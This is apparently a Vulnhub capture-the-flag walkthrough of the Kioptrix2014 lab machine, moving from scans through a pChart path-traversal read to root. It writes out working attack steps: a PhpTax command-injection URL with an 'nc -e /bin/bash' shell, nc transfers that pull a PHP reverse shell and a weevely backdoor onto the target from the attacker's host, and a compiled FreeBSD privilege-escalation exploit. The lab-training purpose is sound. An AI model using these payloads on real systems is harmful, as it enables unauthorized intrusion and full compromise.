Vulnhub

Kioptrix2014

Enumeration

Like always let’s start with a scan

nmap -Pn -sS -sC -vv -T 4 -p- 192.168.1.121
Nmap scan report for kioptrix2014 (192.168.1.134)
Host is up (0.00024s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21
OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21
OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:04:AC:9C (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8
cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms kioptrix2014 (192.168.1.134)

While that is running, i decided to check if it had a website.
It did, the website contained a simple “It Works!”

I looked at the source code.

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

Looking at the comment a decided to append it to the url. It redirected us to the following url

http://192.168.1.134/pChart2.1.3/examples/index.php

The website contains a lot of functions to create graphs…

Dirb

I decided to run dirb to see if it finds something interesting.

dirb http://192.168.1.134/pChart2.1.3/ /usr/share/dirb/wordlists/common.txt 
dirb http://192.168.1.134/ /usr/share/dirb/wordlists/common.txt 

I think get something particularly good. A bunch of indexable directories that didn’t contain anything good.

Nikto

So now nikto, let’s see what he has to say.

nikto -h 192.168.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.134
+ Target Hostname:    192.168.1.134
+ Target Port:        80
+ Start Time:         2017-05-17 05:00:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

mod_ssl/2.2.21 seems vulnerable. Used seachsploit to lookup mod_ssl.

searchsploit mod_ssl
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)                                                                              | ./unix/remote/764.c
Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                                                        | ./multiple/dos/21575.txt
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)                                                                                | ./unix/remote/21671.c
Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit                                              | ./unix/remote/40347.txt
Apache/mod_ssl 2.0.x - Remote Denial of Service                                                                                                   | ./linux/dos/24590.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

We got OpenFuckv2 that looks promising, but after looking at the source code it seems to target apache1x not apache2x.

pChart2.1.3

So i decided to searchsploit pChart


searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/kioprix# searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                                                                           | ./php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

We got a hit, after reading the file, it looks like the webapps is vulnerable to LFI.

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

And it does work. I looked at the /etc/passwd and other typical files. I had to google where the default apache2 install goes in bsd. We know it’s a FreeBSD machine and it’s using apache 2.2.21. The location is /usr/local/etc/apache22/httpd.conf . That file contains the virtualhosts configuration. Near the end of the file is the interesting part.

http://192.168.1.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>

It looks like we need to change our Broswer Agent to Mozilla/4.0

Phptax

So we got this website that looks is made to submit taxes. I played around with
it for a few minutes and decided to searchsploit it.

searchsploit phptax
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection                                                                                              | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution                                                                                                                | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution                                                                                 | ./php/webapps/25849.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

We got more vulnerable software.

So it looks that we can execute commands directly on the url.
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

This would create a reverse tcp connection, but this will not work on our
machine because it’s using an nc version that does not support the option -e.

If we look at the 21665.txt, we can see that it converts the file and puts it
in data/pdf/ . If we navigate to the page we’ll see all the previous upload.

We can maybe try to upload a php reverse shell.
So this one was tricky for me, took me forever to figure a way in.

By looking at the httpd-error.log from the previous exploit, i looked that the script is looking for a file located in the folder files.

The page is browseable and is indexed to see all the files it calls to create those pdf/png. So i tried writing something in it using echo.

http://192.168.1.134:8080/phptax/index.php?pfilez=yp;echo%20%22YO%22%20%3E%3E%20.files/1040d-pg1.calc;&pdf=make

This would append the worse YO at the end of the file located in ./files/1040d-pg1.calc and it did. Now that i know i can write into it, i’ll setup a ncat to transfer a file

nc -nlv 1234 < php-reverse-shell

http://192.168.1.134:8080/phptax/index.php?pfilez=yp;nc%20192.168.1.148%201234%20%3E%3E%20./files/shell.txt.php;&pdf=make Using that url i managed to upload my reverse shell, the only thing left is to setup a listener and load the me.txt.php

Weevely the gorgeous

First thing, i’ll upload a weevely reverse shell because it’s more awesome
shell than a regular reverse shell. I tried uploading it to the same location
as the previous reverse shell but weevely wouldn’t connect. I guess it’s the
browser agent that is blocking it since i’m getting a 403 error. So using the
first reverse shell i’ll upload the second one.

I’ll browse to /usr/local/www/apache22/data/pChart2.1.3 the location of the
first website we encountered. I’ll setup another ncat listener to transfer a
file. I tried curl and wget and it looks like we can’t use them.

On kali box

weevely generate me.php toor
nc -nlv 1234 < me.php

On kioptrix

pwd
/usr/local/www/apache22/data/pChart2.1.3

nc 192.168.1.148 > me.php

On kali box

weevely http://192.168.1.134/pChart2.1.3/me.php toor

Well… Nothing seems to work. I tried transfering it to multiple places and file names and nada. I guess it’s python ? Let’s move on then.

Enumeration

So like always first thing first

uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64

FreeBSD 9.0

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation                                                                                              | ./freebsd/local/26368.c
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                                                                                            | ./freebsd/local/28718.c
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

After reading both of them, i decided to try the first one 26368.c I used nc again to transfer it and used gcc to compile it.

nc 192.168.1.148 1234 > exploit.c
gcc exploit.c
./a.out

id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

Well yeah, that’s good game.

It literally took me forever to get a shell on the machine. Like FOREVER!